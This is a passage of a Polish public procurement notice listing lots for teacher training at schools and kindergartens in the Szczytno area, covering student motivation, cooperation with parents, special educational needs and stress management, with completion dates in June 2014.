Nowoczesne metody, techniki uczenia się i zapamiętywania, odpowiedni dobór do celów i potrzeb uczniów. Jak przeprowadzić diagnozę sposobów uczenia się uczniów, narzędzia? -  nauczyciele klas IV-VI.
Wypracowanie scenariusza warsztatu,ów dla rodziców uczniów klas IV-VI na temat: Wspieranie i motywowanie dzieci do uczenia się.
Nabycie przez nauczycieli umiejętności właściwego doboru metod motywujących w zależności od ucznia, kontekstu, sytuacji.
Podniesienie umiejętności nauczycieli w zakresie wzbudzenia większego zainteresowania uczniów przedmiotem oraz samodzielnego rozwiązywania problemów.
Ewaluacja pracy nauczyciela pod kątem efektywności stosowanych technik motywujących uczniów do nauki, narzędzia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Doskonalenie pracy nauczycieli ze Szkoły Podstawowej im. Komisji Edukacji Narodowej w Jedwabnie - Grupa I i II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Techniki uczenia się i metody motywujące do nauki
Poszerzenie warsztatu pracy nauczycieli w z zakresie technik uczenia się oraz metod motywujących uczniów do nauki.
Poszerzenie warsztatu pracy nauczycieli w z zakresie technik nauczania oraz metod aktywizujących uczniów.
Prezentacja metod motywowania uczniów do pracy i technik uczenia się zwiększających odpowiedzialność osobistą za rozwój.
Wdrażanie do praktyki szkolnej nowych metod motywowania uczniów do pracy oraz technik uczenia się.
Wypracowanie katalogu sposobu motywowania uczniów oraz technik uczenia się.
Nabycie przez nauczycieli umiejętności właściwego doboru czynników motywujących w zależności od ucznia, sytuacji, kontekstu.
Warsztat z ekspertem podsumowujący doświadczenia nauczycieli w zastosowaniu wybranych metod..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Doskonalenie pracy nauczycieli ze Szkoły Podstawowej w Olszynach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Techniki uczenia się i metody motywujące do nauki
Poszerzenie warsztatu pracy nauczycieli w z zakresie technik uczenia się oraz metod motywujących uczniów do nauki.
Jak skutecznie motywować uczniów do nauki? Metody i techniki, praktyczne rozwiązania.
Nowoczesne metody aktywizujące, techniki uczenia się i zapamiętywania. 
Wypracowanie katalogu sposobu motywowania uczniów oraz technik uczenia się.
Aktywizujące metody nauczania- szczegółowe i praktyczne, przepracowanie wybranych metod, przystosowanie do możliwości uczniów o zróżnicowanym poziomie w zależności od ucznia, sytuacji, kontekstu.
 Jak przeprowadzić diagnozę sposobów uczenia się uczniów, narzędzia?
 Ewaluacja pracy nauczyciela pod kątem efektywności stosowanych technik motywujących uczniów do nauki, narzędzia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Doskonalenie pracy nauczycieli ze Szkoły Podstawowej w Wawrochach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Techniki uczenia się i metody motywujące do nauki
Poszerzenie warsztatu pracy nauczycieli w z zakresie technik uczenia się oraz metod motywujących uczniów do nauki.
Jak skutecznie motywować uczniów do nauki? Metody i techniki, praktyczne rozwiązania.
Nowoczesne metody aktywizujące, techniki uczenia się i zapamiętywania. 
Wypracowanie katalogu sposobu motywowania uczniów oraz technik uczenia się
Aktywizujące metody nauczania- szczegółowe i praktyczne, przepracowanie wybranych metod, przystosowanie do możliwości uczniów o zróżnicowanym poziomie w zależności od ucznia, sytuacji, kontekstu
Jak przeprowadzić diagnozę sposobów uczenia się uczniów, narzędzia?
Ewaluacja pracy nauczyciela pod kątem efektywności stosowanych technik motywujących uczniów do nauki, narzędzia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Doskonalenie pracy nauczycieli ze Szkoły Podstawowej w Zabielach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Techniki uczenia się i metody motywujące do nauki
Poszerzenie warsztatu pracy nauczycieli w z zakresie technik uczenia się oraz metod motywujących uczniów do nauki.
Jak skutecznie motywować uczniów do nauki? Metody i techniki, praktyczne rozwiązania.
Nowoczesne metody aktywizujące, techniki uczenia się i zapamiętywania. 
Wypracowanie katalogu sposobu motywowania uczniów oraz technik uczenia się.
Aktywizujące metody nauczania- szczegółowe i praktyczne, przepracowanie wybranych metod, przystosowanie do możliwości uczniów o zróżnicowanym poziomie w zależności od ucznia, sytuacji, kontekstu
Jak przeprowadzić diagnozę sposobów uczenia się uczniów, narzędzia?
Ewaluacja pracy nauczyciela pod kątem efektywności stosowanych technik motywujących uczniów do nauki, narzędzia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Doskonalenie pracy nauczycieli z Liceum Ogólnokształcącego w Zespole Szkół Nr 1 w Szczytnie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Techniki uczenia się i metody motywujące do nauki
Poszerzenie warsztatu pracy nauczycieli w z zakresie technik uczenia się oraz metod motywujących uczniów do nauki.
Nowoczesne techniki motywowania uczniów do nauki.
Nowoczesne aktywizujące metody pracy z uczniem o specjalnych potrzebach edukacyjnych.
Zastosowanie technik uczenia się i metod motywujących uczniów w praktyce-praktyczne rozwiązania.
Organizacja indywidualizacji pracy na lekcji - rozwiązania metodyczne.
Opracowanie katalogu metod aktywizujących i motywujących. 
Ewaluacja pracy nauczyciela pod kątem efektywności stosowanych technik motywujących uczniów do nauki, narzędzia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Doskonalenie pracy nauczycieli z Liceum Ogólnokształcącego w Zespole Szkół Nr 2 w Szczytnie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Techniki uczenia się i metody motywujące do nauki
Poszerzenie warsztatu pracy nauczycieli w z zakresie technik uczenia się oraz metod motywujących uczniów do nauki.
Jak skutecznie motywować uczniów do nauki? Metody i techniki, praktyczne rozwiązania.
Nowoczesne metody, techniki uczenia się i zapamiętywania, odpowiedni dobór do celów i potrzeb uczniów. Jak przeprowadzić diagnozę sposobów uczenia się uczniów, narzędzia? 
Metody skutecznego promowania wartości uczenia się uczniów.  Jak zachęcać uczniów do uczenia się? 
Nabycie umiejętności rozpoznawania stylów uczenia się uczniów.
Ewaluacja pracy nauczyciela pod kątem efektywności stosowanych technik motywujących uczniów do nauki, narzędzia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Doskonalenie pracy nauczycieli z Liceum Ogólnokształcącego w Zespole Szkół Nr 3 w Szczytnie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Techniki uczenia się i metody motywujące do nauki
Poszerzenie warsztatu pracy nauczycieli w z zakresie technik uczenia się oraz metod motywujących uczniów do nauki.
Nowoczesne techniki motywowania uczniów do nauki i metody pracy.
Nowoczesne aktywizujące metody pracy z uczniem o specjalnych potrzebach edukacyjnych.
Zastosowanie technik uczenia się i metod motywujących uczniów  w praktyce-praktyczne rozwiązania. 
Organizacja indywidualizacji pracy na lekcji - rozwiązania metodyczne.
Opracowanie katalogu metod aktywizujących i motywujących. 
 Nabycie umiejętności stosowania poznanych metod w praktyce na lekcjach i na zajęciach pozalekcyjnych w grupie uczniów o zróżnicowanym potencjale oraz w dużym zespole klasowym.
Ewaluacja pracy nauczyciela pod kątem efektywności stosowanych technik motywujących uczniów do nauki, narzędzia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Doskonalenie pracy nauczycieli z Liceum Ogólnokształcącego w Zespole Szkół Nr 3 w Szczytnie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Techniki uczenia się i metody motywujące do nauki
Poszerzenie warsztatu pracy nauczycieli w z zakresie technik uczenia się oraz metod motywujących uczniów do nauki.
Nowoczesne techniki motywowania uczniów do nauki i metody pracy.
Nowoczesne aktywizujące metody pracy z uczniem o specjalnych potrzebach edukacyjnych.
Zastosowanie technik uczenia się i metod motywujących uczniów  w praktyce-praktyczne rozwiązania. 
Organizacja indywidualizacji pracy na lekcji - rozwiązania metodyczne.
Opracowanie katalogu metod aktywizujących i motywujących. 
 Nabycie umiejętności stosowania poznanych metod w praktyce na lekcjach i na zajęciach pozalekcyjnych w grupie uczniów o zróżnicowanym potencjale oraz w dużym zespole klasowym.
Ewaluacja pracy nauczyciela pod kątem efektywności stosowanych technik motywujących uczniów do nauki (narzędzia)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Doskonalenie pracy nauczycieli z Miejskiego Przedszkola Nr 2 Fantazja w Szczytnie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rodzice są partnerami przedszkola
Podniesienie kompetencji nauczycieli w zakresie umiejętności interpersonalnych z rodzicami.
Komunikacja interpersonalna, asertywność.
Sprawna komunikacja z rodzicami dzieci w wieku przedszkolnym.
Poznanie sposobów radzenia sobie w sytuacjach trudnych i stresowych.
Praca z oporem rodzica  ćwiczenia praktyczne. Zasady współpracy nauczycieli z tzw. rodzicem trudnym.
Prowadzenie spotkań z rodzicami.
Pochwała i konstruktywna krytyka dziecka.
Warsztat z ekspertem podsumowujący doświadczenia nauczycieli w relacjach z rodzicami..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Doskonalenie pracy nauczycieli z Przedszkola Niepublicznego Nr 1 Pod Topolą w Szczytnie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rodzice są partnerami przedszkola
Podniesienie kompetencji nauczycieli w zakresie umiejętności interpersonalnych z rodzicami.
Komunikacja interpersonalna,  asertywność, wyrażanie krytyki i złości.
Współpraca nauczycieli z domem rodzinnym dziecka oraz rodziców  z przedszkolem jako instytucją. 
Poznanie sposobów radzenia sobie w sytuacjach trudnych i stresowych. Wykorzystanie technik relaksacyjnych.
Praca z oporem rodzica  ćwiczenia praktyczne. 
Zasady współpracy nauczycieli z tzw. rodzicem trudnym.
Pochwała i konstruktywna krytyka dziecka. Prowadzenie spotkań z rodzicami.
Warsztat z ekspertem podsumowujący doświadczenia nauczycieli w relacjach z rodzicami..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Doskonalenie pracy nauczycieli z Gminnego Przedszkola w Lipowcu Jasia i Małgosi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rodzice są partnerami szkoły
Podniesienie kompetencji nauczycieli w zakresie umiejętności interpersonalnych z rodzicami.
Komunikacja interpersonalna, prowadzenie spotkań z rodzicami, radzenia sobie w sytuacjach stresowych, asertywność.
Współpraca z rodzicami (aktywne metody pracy). Ustalanie wspólnych celów wychowawczych i wartości.
Ukazanie modelu współpracy  nauczycieli z rodzicami dzieci w wieku przedszkolnym.
Radzenie sobie z prowadzeniem spotkań z rodzicami, koniecznością występowania przed publicznością poprzez koncentrowanie się na zadaniu, a nie na pojawiających się emocjach.
Radzenie sobie z napięciem pojawiającym się w trudnych sytuacjach; radzenie sobie ze stresem, przybliżenie znaczenia pozytywnego myślenia.
Warsztat z ekspertem podsumowujący doświadczenia nauczycieli w relacjach z rodzicami..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Doskonalenie pracy nauczycieli ze Szkoły Podstawowej w Dąbrowach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rodzice są partnerami szkoły
Podniesienie kompetencji nauczycieli w zakresie umiejętności interpersonalnych z rodzicami.
Komunikacja interpersonalna: nauczyciele - rodzice.  - podniesienie/ rozwinięcie kompetencji w zakresie komunikacji interpersonalnej;
- umiejętność dopasowania komunikatu do odbiorcy;
- znajomość barier w komunikacji społecznej;
- znajomość różnych postaw rodziców i umiejętność postępowania z różnymi postawami rodziców;
- większa świadomość w budowaniu relacji nauczyciela z rodzicami;
Nowe, atrakcyjne formy prowadzenia  spotkań  z rodzicami.
- umiejętność planowania i prowadzenia ciekawych, nowatorskich  spotkań  edukacyjnych  z rodzicami;
- pozyskanie sprawdzonych metod, pomysłów i ciekawych materiałów do wykorzystania w praktyce przygotowanie przykładowych innowacyjnych scenariuszy  spotkań z rodzicami;
- poznanie przez nauczycieli różnorodnych form integracji i komunikacji szkoły z rodzicami..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Doskonalenie pracy nauczycieli ze Szkoły Podstawowej im. Jana Pawła II w Kolonii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rodzice są partnerami szkoły
Podniesienie kompetencji nauczycieli w zakresie umiejętności interpersonalnych z rodzicami.
Komunikacja interpersonalna.
Radzenie sobie w sytuacjach trudnych, radzenie sobie ze stresem, asertywność.
Prowadzenie spotkań z rodzicami (jak podnieść frekwencję rodziców, uważne słuchanie rodziców podczas spotkań) . Rodzice jako partnerzy szkoły.
Prawidłowa komunikacja  nauczycieli  z rodzicami. Szkoła jako instytucja współpracująca z domem rodzinnym. 
Opracowanie scenariusza warsztatu z rodzicami na temat problemów ucznia i rodzica we współczesnych czasach..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> Doskonalenie pracy nauczycieli ze Szkoły Podstawowej im. Marii Konopnickiej w Łatanej Wielkiej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rodzice są partnerami szkoły
Podniesienie kompetencji nauczycieli w zakresie umiejętności interpersonalnych z rodzicami.
Komunikacja interpersonalna.
Radzenie sobie w sytuacjach trudnych, radzenie sobie ze stresem, asertywność.
Prowadzenie spotkań z rodzicami, jak podnieść frekwencję rodziców, uważne słuchanie rodziców podczas spotkań. Rodzice jako partnerzy szkoły.
Prawidłowa komunikacja  nauczycieli  z rodzicami. Szkoła jako instytucja współpracująca z domem rodzinnym.
Opracowanie scenariusza warsztatu z rodzicami na temat problemów ucznia i rodzica we współczesnych czasach..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> Doskonalenie pracy nauczycieli ze Szkoły Podstawowej im. Mikołaj Kopernika w Szymanach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rodzice są partnerami szkoły
Podniesienie kompetencji nauczycieli w zakresie umiejętności interpersonalnych z rodzicami.
Nowe, atrakcyjne formy prowadzenia  spotkań  z rodzicami.
- umiejętność planowania i prowadzenia ciekawych, nowatorskich  spotkań  edukacyjnych  z rodzicami;
- pozyskanie sprawdzonych metod, pomysłów i ciekawych materiałów do wykorzystania w praktyce (przygotowanie przykładowych innowacyjnych scenariuszy  spotkań z rodzicami);
- poznanie przez nauczycieli różnorodnych form integracji i komunikacji szkoły z rodzicami.
Komunikacja interpersonalna: nauczyciele - rodzice.  - podniesienie/ rozwinięcie kompetencji w zakresie komunikacji interpersonalnej;
- umiejętność dopasowania komunikatu do odbiorcy;
- znajomość barier w komunikacji społecznej;
- znajomość różnych postaw rodziców i umiejętność postępowania z różnymi postawami rodziców;
- większa świadomość w budowaniu relacji nauczyciela z rodzicami;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 23 <b>NAZWA:</b> Doskonalenie pracy nauczycieli z Gminnego Przedszkola w Nowinach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Praca z uczniem o specjalnych potrzebach edukacyjnych
Zwiększenie kompetencji nauczycieli w zakresie pracy z dzieckiem o specjalnych potrzebach edukacyjnych w wieku przedszkolnym. 
Rozpoznawanie indywidualnych potrzeb dzieci w wieku przedszkolnym. Funkcjonowanie dzieci niepełnosprawnych (ze słabosłyszeniem, , słabowidzeniem,  upośledzeniem umysłowym, autyzmem, niepełnosprawnością ruchową, sprzężoną) oraz z  ADHD, opóźnionym rozwojem mowy, nadpobudliwością w grupie przedszkolnej.
Zasady pracy z dziećmi o specjalnych potrzebach edukacyjnych, w tym: zakres i sposoby dostosowania wymagań edukacyjnych do aktualnych możliwości psychofizycznych ucznia, metodologia.
Doskonalenie umiejętności zespołowego planowania pracy z dzieckiem posiadającym orzeczenie o potrzebie kształcenia specjalnego.
Tworzenie IPET (analiza orzeczenia, wielospecjalistyczna ocena poziomu funkcjonowania ucznia, sformułowanie potrzeb ucznia, określenie form, sposobów i metod pracy z uczniem, opracowanie harmonogramu).
Integracja dzieci, nauczycieli, rodziców wokół działań służących zaspakajaniu potrzeb dziecka..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 24 <b>NAZWA:</b> Doskonalenie pracy nauczycieli ze Szkoły Podstawowej w Rudce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Praca z uczniem o specjalnych potrzebach edukacyjnych
Zwiększenie kompetencji nauczycieli w zakresie pracy z uczniem o specjalnych potrzebach edukacyjnych.
Organizacja pomocy psychologiczno - pedagogicznej w  pracy  z  zespołem klasowym.  Obowiązujące  wzory dokumentów.
- umiejętność prowadzenia obowiązującej dokumentacji w zakresie udzielania pomocy
 psychologiczno - pedagogicznej.;
- planowanie i koordynowanie pomocy psychologiczno - pedagogicznej.;
- rola i zadania wychowawcy, a także innych nauczycieli w udzielaniu uczniom pomocy psychologiczno - pedagogicznej;
- rozpoznawanie u uczniów indywidualnych  potrzeb rozwojowych i edukacyjnych  oraz możliwości psychofizycznych ucznia
Opieka nad dzieckiem przewlekle chorym.
- obowiązki placówki oświatowej w przypadku przyjęcia dziecka przewlekle chorego do szkoły;
- procedury postępowania z chorym dzieckiem (np. z  cukrzycą, astmą, epilepsją) - na co dzień oraz w sytuacji zaostrzenia objawów czy ataku choroby.
Wielopoziomowe nauczanie  w zespołach klasowych z dużą liczbą uczniów o specjalnych potrzebach edukacyjnych.
- organizacja nauczania w sposób uwzględniający różnice między uczniami, dostosowywanie wymagań edukacyjnych;
- praca indywidualna z uczniem - różnicowanie zadań;
- metody pracy z uczniem o specjalnych potrzebach edukacyjnych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 25 <b>NAZWA:</b> Doskonalenie pracy nauczycieli z Przedszkola Samorządowego im. Jana Brzechwy w Wielbarku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Efektywna organizacja pracy zespołów nauczycielskich
Rozwijanie umiejętności w zakresie prawidłowych form komunikacji w celu poprawy jakości stosunków międzyludzkich oraz atmosfery pracy w przedszkolu;  
Komunikacja interpersonalna.
Poznanie nowoczesnych technik panowania nad sytuacją konfliktową w miejscu pracy (m.in. spotkania konfrontacyjne, mediacje, kompromis).
Radzenie sobie ze stresem oraz konstruktywne rozwiązywanie konfliktów, prawidłowe podejmowanie decyzji. 
Doskonalenie umiejętności samooceny własnych postaw i zachowań; umiejętność rozpoznawania i nazywania emocji, towarzyszących konfliktom międzyludzkim..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 26 <b>NAZWA:</b> Doskonalenie pracy nauczycieli z Miejskiego Przedszkola nr 9 Kubuś Puchatek w Szczytnie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Efektywna organizacja pracy zespołów nauczycielskich
Wzmocnienie modelu pracy rady pedagogicznej przedszkola, opartego na pracy zespołów nauczycielskich.
Warsztat z ekspertem podsumowujący doświadczenia nauczycieli w zastosowaniu nabytych umiejętności w obszarze efektywnej organizacji pracy zespołów.
Komunikacja interpersonalna (m.in. umiejętności komunikacyjne, asertywność).
Radzenie sobie ze stresem, radzenie sobie w trudnych sytuacjach konfliktowych oraz konstruktywne rozwiązywania konfliktów. 
Nabywanie wiedzy oraz umiejętności z zakresu tworzenia zespołu, określania ról jego członków, organizacji i monitorowania pracy zespołu, podziału zadań członków zespołu.
 Budowanie wśród nauczycieli kultury pracy zespołów i poprawa atmosfery pracy w placówce przedszkolnej.
Praca metodą projektów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 27 <b>NAZWA:</b> Doskonalenie pracy nauczycieli ze Szkoły Podstawowej w Orzynach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Obszar doskonalenia
Efektywna organizacja pracy zespołów nauczycielskich
Cel szkolenia
Podniesienie umiejętności nauczycieli w obszarze efektywnej organizacji  pracy zespołowej.
Efektywna organizacja pracy zespołów nauczycielskich.
Konstruktywne rozwiązywanie konfliktów.
Komunikacja interpersonalna.
Budowanie zespołów nauczycieli, planowanie ich pracy. Opracowania procedur szkolnych.
Radzenie sobie ze stresem..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 28 <b>NAZWA:</b> Doskonalenie pracy nauczycieli ze Szkoły Podstawowej w Dźwierzutach - Grupa I i II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ocenianie kształtujące.
Podniesienie kompetencji nauczycieli w zakresie oceniania kształtującego.
Prezentacja Ocenianie kształtujące - podstawy dla całej Rady Pedagogicznej.
Moderowane spotkania zespołów nauczycieli, poświęcone opracowaniu indywidualnych i zespołowych metod oceniania kształtującego oraz monitorowaniu i doskonaleniu wprowadzonych rozwiązań.
Doskonalenie umiejętności oceniania kształtującego dla grup nauczycieli np. wg uczonych przedmiotów.
Warsztat z ekspertem podsumowujący doświadczenia nauczycieli w zastosowaniu oceniania kształtującego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 29 <b>NAZWA:</b> Doskonalenie pracy nauczycieli z Gimnazjum im. Konstantego Ildefonsa Gałczyńskiego w Świętajnie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nauczyciel 45 +
Doskonalenie nauczycieli w zakresie rozwoju osobistego.
Radzenie  sobie ze stresem -  wzmocnienia sił psychicznych i odporności na stres (relacje uczeń  - nauczyciel, w relacjach między nauczycielami).
- konstruktywne  radzenie sobie ze stresem, tworzenie własnych strategii radzenia sobie w trudnych sytuacjach zawodowych; 
- budowanie i utrzymanie wysokiej motywacji zawodowej- identyfikacja własnych motywatorów  i de motywatorów  wewnętrzn.; 
Trening odreagowywania nieprzyjemnych emocji, radzenia sobie w sytuacjach subiektywnie trudnych.
- radzenie sobie ze stresem;
- eliminacja źródeł stresu w środowisku pracy;
- techniki i metody rozwijania odporności na sytuacje stresowe - elementy treningu relaksacyjnego.
Praca głosem - emisja i higiena.
- warunki prawidłowej emisji głosu
- typowe problemy z głosem występujące u nauczycieli
- optymalne zasady pracy z głosem
- ćwiczenia prawidłowej emisji głosu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 30 <b>NAZWA:</b> Doskonalenie pracy nauczycieli ze Szkoły Podstawowej im. Kornela Makuszyńskiego w Jerutach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nauczyciel 45 +
Podniesienie kwalifikacji w obszarze obsługi nowych technologii i doskonalenia w zakresie rozwoju osobistego.
Program rozwoju osobistego dotyczących siły i odporności psychicznej, komunikacji interpersonalnej, asertywności, radzenia sobie ze stresem.
Profilaktyka wypalenia zawodowego oraz radzenia sobie z jego objawami.
Doskonalenie umiejętności posługiwania się nowoczesnymi technologiami..</p></li>
